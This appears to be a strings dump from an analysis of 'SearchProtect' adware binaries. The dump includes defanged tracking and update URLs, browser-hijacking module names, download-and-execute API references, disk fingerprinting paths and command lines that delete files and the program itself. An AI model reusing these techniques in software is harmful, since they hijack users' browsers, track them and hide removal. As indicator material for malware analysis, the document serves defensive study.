- floating point support not loaded

USER32.DLL

USER32.DLL

portuguese-brazilian

portuguese-brazilian

WindowsMangerProtect

WindowsMangerProtect

SOFTWARE\supWindowsMangerProtect

SOFTWARE\supWindowsMangerProtect

xa.geoip

xa.geoip

visit.heartbeat

visit.heartbeat

ProtectWindowsManager.exe

ProtectWindowsManager.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

TypesSupported

TypesSupported

%s is already installed

%s is already installed

%s installed

%s installed

%s failed to install. Error %d

%s failed to install. Error %d

%s is not installed

%s is not installed

Could not remove %s. Error %d

Could not remove %s. Error %d

WindowsProtectManger

WindowsProtectManger

Advapi32.dll

Advapi32.dll

/c ping 127.0.0.1 -n 2 > nul && del

/c ping 127.0.0.1 -n 2 > nul && del

"%s" %s

"%s" %s

psapi.dll

psapi.dll

Explorer.exe

Explorer.exe

urlmon.dll

urlmon.dll

update.exe

update.exe

Assertion failed: %s, file %s, line %d

Assertion failed: %s, file %s, line %d

WindowsMangerProtect Service

WindowsMangerProtect Service

C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe

C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe

WindowsMangerProtect service

WindowsMangerProtect service

SysTool PasSame LIMITED

SysTool PasSame LIMITED

Windows SysTool Svr

Windows SysTool Svr

20.0.0.2227

20.0.0.2227

Windows SysTool.exe

Windows SysTool.exe

HPNotify.exe_3640:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

wszUrl

wszUrl

strUrlTemp

strUrlTemp

hKEY

hKEY

strSelUrl

strSelUrl

strUrl

strUrl

strConfUrlTemp

strConfUrlTemp

strDsUrl

strDsUrl

strHpUrl

strHpUrl

strCmdLine

strCmdLine

tCPW

tCPW

%UUUU

%UUUU

e_GetBrowserCurrentHpUrl

e_GetBrowserCurrentHpUrl

e_GetBrowserCurrentDsUrl

e_GetBrowserCurrentDsUrl

URLDownloadToFileW

URLDownloadToFileW

URLDownloadToFileW ret:0XX

URLDownloadToFileW ret:0XX

Error : %d

Error : %d

inflate 1.1.3 Copyright 1995-1998 Mark Adler

inflate 1.1.3 Copyright 1995-1998 Mark Adler

1.1.3

1.1.3

monochrome

monochrome

unsupported bit depth

unsupported bit depth

`'\%D,3

`'\%D,3

Run-Time Check Failure #%d - %s

Run-Time Check Failure #%d - %s

%s%s%p%s%ld%s%d%s

%s%s%p%s%ld%s%d%s

%s%s%s%s

%s%s%s%s

RegOpenKeyExW

RegOpenKeyExW

RegCloseKey

RegCloseKey

del /s/q %1\*.*

del /s/q %1\*.*

%suninstall.bat

%suninstall.bat

E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb

E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb

KERNEL32.dll

KERNEL32.dll

GetKeyState

GetKeyState

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteW

ShellExecuteW

ShellExecuteA

ShellExecuteA

ShellExecuteExW

ShellExecuteExW

SHELL32.dll

SHELL32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

SHDeleteKeyW

SHDeleteKeyW

SHLWAPI.dll

SHLWAPI.dll

MSVCP110.dll

MSVCP110.dll

MSVCR110.dll

MSVCR110.dll

_calloc_crt

_calloc_crt

_CRT_RTC_INITW

_CRT_RTC_INITW

__crtGetShowWindowMode

__crtGetShowWindowMode

_amsg_exit

_amsg_exit

_wcmdln

_wcmdln

_crt_debugger_hook

_crt_debugger_hook

__crtUnhandledException

__crtUnhandledException

__crtTerminateProcess

__crtTerminateProcess

__crtSetUnhandledExceptionFilter

__crtSetUnhandledExceptionFilter

GdiplusShutdown

GdiplusShutdown

gdiplus.dll

gdiplus.dll

IMM32.dll

IMM32.dll

DeleteUrlCacheEntryW

DeleteUrlCacheEntryW

WININET.dll

WININET.dll

COMCTL32.dll

COMCTL32.dll

GetProcessHeap

GetProcessHeap

#*1892 $

#*1892 $

%,3:;4-&

%,3:;4-&

.?AVCActiveXEnum@DuiLib@@

.?AVCActiveXEnum@DuiLib@@

.?AVCWebBrowserUI@DuiLib@@

.?AVCWebBrowserUI@DuiLib@@

3?3

3?3

1-2}2

1-2}2

77t7

77t7

9":,:6:@:

9":,:6:@:

12u2

12u2

9 9$9(9,9094989

9 9$9(9,9094989

0 1@1\1|1

0 1@1\1|1

hXXp://VVV.bing.com/

hXXp://VVV.bing.com/

hXXp://VVV.yahoo.com/

hXXp://VVV.yahoo.com/

hXXp://VVV.google.com/

hXXp://VVV.google.com/

%sconf

%sconf

web/?type=dspp&

web/?type=dspp&

web/?type=dspp

web/?type=dspp

hXXp://VVV.v9.com/

hXXp://VVV.v9.com/

Itemd

Itemd

BrowserAction.dll

BrowserAction.dll

%u_%u

%u_%u

%s_%s

%s_%s

%s_X

%s_X

\\.\PhysicalDrive%d

\\.\PhysicalDrive%d

\\.\Scsi%d:

\\.\Scsi%d:

UrlEdit

UrlEdit

conf.xml

conf.xml

hXXp://v9.com/license_agreement.html

hXXp://v9.com/license_agreement.html

hXXp://v9.com/privacy_policy.html

hXXp://v9.com/privacy_policy.html

hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s

hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s

hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s

hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s

%stmp%d.tmp

%stmp%d.tmp

urlmon.dll

urlmon.dll

main.xml

main.xml

explorer.exe

explorer.exe

Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex

Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex

IeWatchDog.dll

IeWatchDog.dll

BrowerWatchFF.dll

BrowerWatchFF.dll

BrowerWatchCH.dll

BrowerWatchCH.dll

Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)

Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)

msimg32.dll

msimg32.dll

User32.dll

User32.dll

WM_KEYDOWN

WM_KEYDOWN

WM_KEYUP

WM_KEYUP

WM_SYSKEYDOWN

WM_SYSKEYDOWN

WM_SYSKEYUP

WM_SYSKEYUP

0xX

0xX

keyboard

keyboard

msftedit.dll

msftedit.dll

password

password

%s%s%s

%s%s%s

Correct password required

Correct password required

%s\%s

%s\%s

WebBrowser

WebBrowser

transshadow

transshadow

transshadow1

transshadow1

dest='%d,%d,%d,%d'

dest='%d,%d,%d,%d'

dest='%d,%d,%d,%d' source='%d,%d,%d,%d'

dest='%d,%d,%d,%d' source='%d,%d,%d,%d'

source='%d,%d,%d,%d' dest='%d,%d,%d,%d'

source='%d,%d,%d,%d' dest='%d,%d,%d,%d'

M-d-d

M-d-d

WebBrowserUI

WebBrowserUI

errorUrl

errorUrl

{D27CDB6E-AE6D-11CF-96B8-444553540000}

{D27CDB6E-AE6D-11CF-96B8-444553540000}

user32.dll

user32.dll

MSPDB110.DLL

MSPDB110.DLL

ADVAPI32.DLL

ADVAPI32.DLL

/c ping 127.0.0.1 -n 2 > nul && del /s/q

/c ping 127.0.0.1 -n 2 > nul && del /s/q

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

%Program Files% (x86)\XTab\skin\

%Program Files% (x86)\XTab\skin\

SupHPNot.exe

SupHPNot.exe

4,0,1,2253

4,0,1,2253

SupHPNty.exe

SupHPNty.exe

ProtectService.exe_3668:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

GET %s%s%s HTTP/1.1

GET %s%s%s HTTP/1.1

Host: %s

Host: %s

%sUser-Agent: Mozilla/4.0

%sUser-Agent: Mozilla/4.0

POST %s HTTP/1.1

POST %s HTTP/1.1

%sContent-Type: %s

%sContent-Type: %s

User-Agent: Mozilla/4.0

User-Agent: Mozilla/4.0

Content-Length: %u

Content-Length: %u

%*s %d %*s

%*s %d %*s

%*[ ]%[^

%*[ ]%[^

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

file_url

file_url

E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb

E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb

GetProcessHeap

GetProcessHeap

GetSystemWindowsDirectoryW

GetSystemWindowsDirectoryW

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

RegOpenKeyW

RegOpenKeyW

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

RegCreateKeyExW

RegCreateKeyExW

ADVAPI32.dll

ADVAPI32.dll

SHELL32.dll

SHELL32.dll

MSVCP110.dll

MSVCP110.dll

InternetCrackUrlW

InternetCrackUrlW

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

SHLWAPI.dll

SHLWAPI.dll

MSVCR110.dll

MSVCR110.dll

_crt_debugger_hook

_crt_debugger_hook

__crtUnhandledException

__crtUnhandledException

__crtTerminateProcess

__crtTerminateProcess

_calloc_crt

_calloc_crt

__crtGetShowWindowMode

__crtGetShowWindowMode

_amsg_exit

_amsg_exit

_wcmdln

_wcmdln

__crtSetUnhandledExceptionFilter

__crtSetUnhandledExceptionFilter

WinHttpCloseHandle

WinHttpCloseHandle

WinHttpOpen

WinHttpOpen

WinHttpSetTimeouts

WinHttpSetTimeouts

WinHttpCrackUrl

WinHttpCrackUrl

WinHttpConnect

WinHttpConnect

WinHttpOpenRequest

WinHttpOpenRequest

WinHttpSetOption

WinHttpSetOption

WinHttpAddRequestHeaders

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpSendRequest

WinHttpGetIEProxyConfigForCurrentUser

WinHttpGetIEProxyConfigForCurrentUser

WinHttpGetProxyForUrl

WinHttpGetProxyForUrl

WinHttpWriteData

WinHttpWriteData

WinHttpReceiveResponse

WinHttpReceiveResponse

WinHttpQueryHeaders

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpReadData

WINHTTP.dll

WINHTTP.dll

SensApi.dll

SensApi.dll

VERSION.dll

VERSION.dll

PSAPI.DLL

PSAPI.DLL

USERENV.dll

USERENV.dll

.?AVCHttpClient@@

.?AVCHttpClient@@

.?AVCTcpipSocket@@

.?AVCTcpipSocket@@

2-2v2

2-2v2

hXXp://

hXXp://

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

http=

http=

WinHttpClient

WinHttpClient

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.

hXXp://xa.xingcloud.com

hXXp://xa.xingcloud.com

xxxx

xxxx

%u_%u

%u_%u

%s_%s

%s_%s

%s_X

%s_X

\\.\PhysicalDrive%d

\\.\PhysicalDrive%d

UpDateProcess.exe

UpDateProcess.exe

hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s

hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s

g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}

g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}

Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex

Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex

Report HeartBeat

Report HeartBeat

cmdshell.exe

cmdshell.exe

hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s

hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s

hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install

hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install

hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall

hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall

explorer.exe

explorer.exe

Advapi32.dll

Advapi32.dll

"%s" %s

"%s" %s

psapi.dll

psapi.dll

Explorer.exe

Explorer.exe

json_value.cpp

json_value.cpp

ljson_reader.cpp

ljson_reader.cpp

ProtectSvc.exe

ProtectSvc.exe

4.0.1.2253

4.0.1.2253